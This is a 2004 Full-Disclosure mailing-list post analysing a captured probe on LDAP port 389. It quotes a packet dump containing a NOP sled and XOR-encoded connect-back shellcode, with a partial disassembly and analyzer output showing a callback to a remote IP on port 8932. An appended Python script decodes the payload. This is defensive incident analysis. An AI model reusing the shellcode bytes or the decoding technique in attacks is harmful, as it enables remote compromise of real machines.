
[Full-Disclosure] (no subject)



We grabbed the binary data from the sniffed capture below. After a quick reverse,
it turns out to be a connect-back shellcode with back server p->
24.19.147.225.

Partially disassembled:
00000084 68 18 13 93 E1                          push    0E1931318h
00000089 68 02 00 22 E4                          push    0E4220002h
0000008E 8B CC                                   mov     ecx, esp
00000090 6A 10                                   push    10h
00000092 51                                      push    ecx
00000093 FF 76 24                                push    dword ptr [esi+24h]
00000096 FF D0                                   call    eax

 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
The following info was automatically generated by "OSAnalyzer" program.
 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

      call  eax=776ba5a3
      776ba5a3 = WS2_32.dll!connect with para 3
      Para 0 is socket # 00000094
      Para 1 is name p-> 00dafcc4
      Para 2 is namelen  00000010
      sin_family AF_INET     , port 8932 IP 24.19.147.225
      call external 776ba5a3 stack 0000000c return ffffffff

; =================== a quick translation =================================
C:\TEMP>ping -a 24.19.147.225

Pinging c-24-19-147-225.client.comcast.net [24.19.147.225] with 32 bytes of data

Hope the info is useful to you.

Regards

Peter Huang
Peter.Huang AT ossecurity.ca
http://www.ossecurity.ca/

> Date: Wed, 25 Feb 2004 08:46:26 -0800
> From: John Sage <jsage@finchhaven.com>
> To: full-disclosure@lists.netsys.com
> Subject: Re: [Full-Disclosure] Probes on port 389
>
> Just picked this up:
>
> On Tue, Feb 24, 2004 at 11:06:50AM -0600, Schmehl, Paul L wrote:
> > From: "Schmehl, Paul L" <pauls@utdallas.edu>
> > To: <intrusion@sans.org>, <full-disclosure@lists.netsys.com>
> > Subject: [Full-Disclosure] Probes on port 389
> > Date: Tue, 24 Feb 2004 11:06:50 -0600
> >
> > I threw up a quick rule on snort to monitor probes on port 389 because I
> > have been seeing entries in /var/log/messages on some boxes that I am
> > responsible for.  This morning we had a probe that hit 26205 different
> > IPs on that port in about 7 minutes (SYN scan only - no payload.)  The
> > source IP was a mailserver in England.  (They've been notified.)
>
> /* snip */
>
> input: snort.log.1077660886
> filter: ip and ( src host 24.6.176.211 )
> #
> T 2004/02/25 08:08:15.042588 24.6.176.211:220 -> 24.19.147.xxx:389 [S]
> #
> T 2004/02/25 08:08:15.092297 24.6.176.211:220 -> 24.19.147.xxx:389 [R]
> #
> T 2004/02/25 08:08:15.097128 24.6.176.211:2211 -> 24.19.147.xxx:389 [S]
> #
> T 2004/02/25 08:08:15.146174 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
> #
> T 2004/02/25 08:08:15.154158 24.6.176.211:2211 -> 24.19.147.xxx:389 [A]
>   30 82 0a 3d 02 01 01 60    82 01 36 02 ff ff ff ff    0..=...`..6.....
>   50 a9 f7 00 10 13 90 90    90 90 90 90 90 90 90 90    P...............
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 90 90 90 90 90 90 90    ................
>   90 90 90 90 90 90 90 90    90 eb 02 eb 05 e8 f9 ff    ................
>   ff ff 5b 80 c3 10 33 c9    66 b9 33 01 80 33 95 43    ..[...3.f.3..3.C
>   e2 fa 14 79 05 94 95 95    1e 61 c0 c3 f1 34 a5 95    ...y.....a...4..
>   95 95 1e d5 99 1e e5 89    38 1e fd 9d 7e 95 1e 50    ........8...~..P
>   cb c8 1c 93 6a a3 fd 1b    db 9b 79 7d 38 95 95 95    ....j.....y}8...
>   fd a6 a7 95 95 fd e2 e6    a7 ca c1 6a 45 1e 6d c2    ...........jE.m.
>   fd 4c 9c 60 38 7d 06 95    95 95 a6 5c c4 c4 c4 c4    .L.`8}.....\....
>   d4 c4 d4 c4 6a 45 1c d3    b1 c2 fd 79 6c 3f f5 7d    ....jE.....yl?.}
>   ec 95 95 95 fd 8d 86 06    74 fd 97 95 b7 71 1e 59    ........t....q.Y
>   ff 85 c4 6a e3 b1 6a 45    fd f6 f8 f1 95 1c f3 a5    ...j..jE........
>   6a a3 fd e7 6b 26 83 7d    c4 95 95 95 1c d3 8b 16    j...k&.}........
>   79 c1 18 a9 b1 a6 55 a6    5c 16 54 80 3e 77 68 53    y.....U.\.T.>whS
>   d1 b1 85 d1 6b d1 b1 a8    6b d1 b1 a9 1e d3 b1 1c    ....k...k.......
>   d1 b1 dd 1c d1 b1 d9 1c    d1 b1 c5 18 d1 b1 85 c1    ................
>   c5 c4 c4 c4 ff 94 c4 c4    6a e3 a5 c4 6a c3 8b 6a    ........j...j..j
>   a3 fd 7a 5b 75 f5 7d 97    95 95 95 6a 45 c6 c0 c3    ..z[u.}....jE...
>   c2 1e f9 b1 8d 1e d0 a9    1e c1 90 ed 96 40 1e df    .............@..
>   8d 1e cf b5 96 48 76 a7    dc 1e a1 1e 96 60 a6 6a    .....Hv......`.j
>   69 a6 55 39 af 51 e1 92    54 5a 98 96 6d 7e 67 ae    i.U9.Q..TZ..m~g.
>   e9 b1 81 e0 74 1e cf b1    96 48 f3 1e 99 de 1e cf    ....t....H......
>   89 96 48 1e 91 1e 96 50    7e 97 a6 55 1e 40 ca cb    ..H....P~..U.@..
>   c8 ce 57 91 95 90 90 90    90 90 90 90 90 90 90 90    ..W.............

... deleted ...
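As an added example (not part of the post or of Peter's analysis), the Python below re-runs the shellcode's own XOR decoder over the quoted capture and parses the sockaddr_in that the push/push/mov ecx,esp sequence in the listing builds on the stack. It assumes the bytes right after the NOP sled (eb 02 eb 05 e8 f9 ff ff ff 5b ... e2 fa) are the pop-ebx/xor-loop decoder their opcodes spell out, and that the hex lines copied from the capture are exact; decoding from the line where the sled ends reproduces the 0x84 offset of the listing.

```python
import socket
import struct

# Dump from the quoted capture, from the 16-byte line where the sled ends (the post's offsets start here).
CAPTURED_HEX = """
90 90 90 90 90 90 90 90 90 eb 02 eb 05 e8 f9 ff ff ff 5b 80 c3 10 33 c9 66 b9 33 01 80 33 95 43
e2 fa 14 79 05 94 95 95 1e 61 c0 c3 f1 34 a5 95 95 95 1e d5 99 1e e5 89 38 1e fd 9d 7e 95 1e 50
cb c8 1c 93 6a a3 fd 1b db 9b 79 7d 38 95 95 95 fd a6 a7 95 95 fd e2 e6 a7 ca c1 6a 45 1e 6d c2
fd 4c 9c 60 38 7d 06 95 95 95 a6 5c c4 c4 c4 c4 d4 c4 d4 c4 6a 45 1c d3 b1 c2 fd 79 6c 3f f5 7d
ec 95 95 95 fd 8d 86 06 74 fd 97 95 b7 71 1e 59 ff 85 c4 6a e3 b1 6a 45 fd f6 f8 f1 95 1c f3 a5
6a a3 fd e7 6b 26 83 7d c4 95 95 95 1c d3 8b 16 79 c1 18 a9 b1 a6 55 a6 5c 16 54 80 3e 77 68 53
d1 b1 85 d1 6b d1 b1 a8 6b d1 b1 a9 1e d3 b1 1c d1 b1 dd 1c d1 b1 d9 1c d1 b1 c5 18 d1 b1 85 c1
c5 c4 c4 c4 ff 94 c4 c4 6a e3 a5 c4 6a c3 8b 6a a3 fd 7a 5b 75 f5 7d 97 95 95 95 6a 45 c6 c0 c3
c2 1e f9 b1 8d 1e d0 a9 1e c1 90 ed 96 40 1e df 8d 1e cf b5 96 48 76 a7 dc 1e a1 1e 96 60 a6 6a
69 a6 55 39 af 51 e1 92 54 5a 98 96 6d 7e 67 ae e9 b1 81 e0 74 1e cf b1 96 48 f3 1e 99 de 1e cf
89 96 48 1e 91 1e 96 50 7e 97 a6 55 1e 40 ca cb c8 ce 57 91 95 90 90 90 90 90 90 90 90 90 90 90
"""

def decode_payload(blob: bytes) -> bytes:
    """Emulate the stub: jmp/call/pop ebx ; add bl,D ; mov cx,N ; xor [ebx],K ; inc ebx ; loop.
    D, N and K are read from the stub's own immediates instead of being hard-coded."""
    s = blob.find(b"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b")
    if s < 0:
        raise ValueError("decoder stub not found")
    start = (s + 9) + blob[s + 12]                     # call pushed the pop's address; add bl, D
    count = struct.unpack_from("<H", blob, s + 17)[0]  # 66 b9 N N -> mov cx, N (0x133 here)
    key = blob[s + 21]                                 # 80 33 K   -> xor byte ptr [ebx], K (0x95)
    out = bytearray(blob)
    for i in range(start, min(start + count, len(out))):
        out[i] ^= key
    return bytes(out)

def find_connect_target(decoded: bytes) -> dict:
    """Find 'push imm32 ; push imm32 ; mov ecx, esp' building sockaddr_in and read its fields."""
    for i in range(len(decoded) - 12):
        if (decoded[i] == 0x68 and decoded[i + 5] == 0x68
                and decoded[i + 6:i + 8] == b"\x02\x00"        # AF_INET, little-endian
                and decoded[i + 10:i + 12] == b"\x8b\xcc"):    # mov ecx, esp
            return {"offset": i,
                    "family": struct.unpack("<H", decoded[i + 6:i + 8])[0],
                    "port": struct.unpack("!H", decoded[i + 8:i + 10])[0],  # network byte order
                    "ip": socket.inet_ntoa(decoded[i + 1:i + 5])}          # first push = sin_addr
    raise ValueError("sockaddr_in construction not found")

def analyse(hex_text: str = CAPTURED_HEX) -> dict:
    return find_connect_target(decode_payload(bytes.fromhex(hex_text)))

if __name__ == "__main__":
    print(analyse())  # {'offset': 132, 'family': 2, 'port': 8932, 'ip': '24.19.147.225'}
```

The result agrees with the OSAnalyzer output quoted above (AF_INET, port 8932, 24.19.147.225), and the decoded bytes at 0x84 are exactly the push/push/mov/call sequence in the listing.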

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html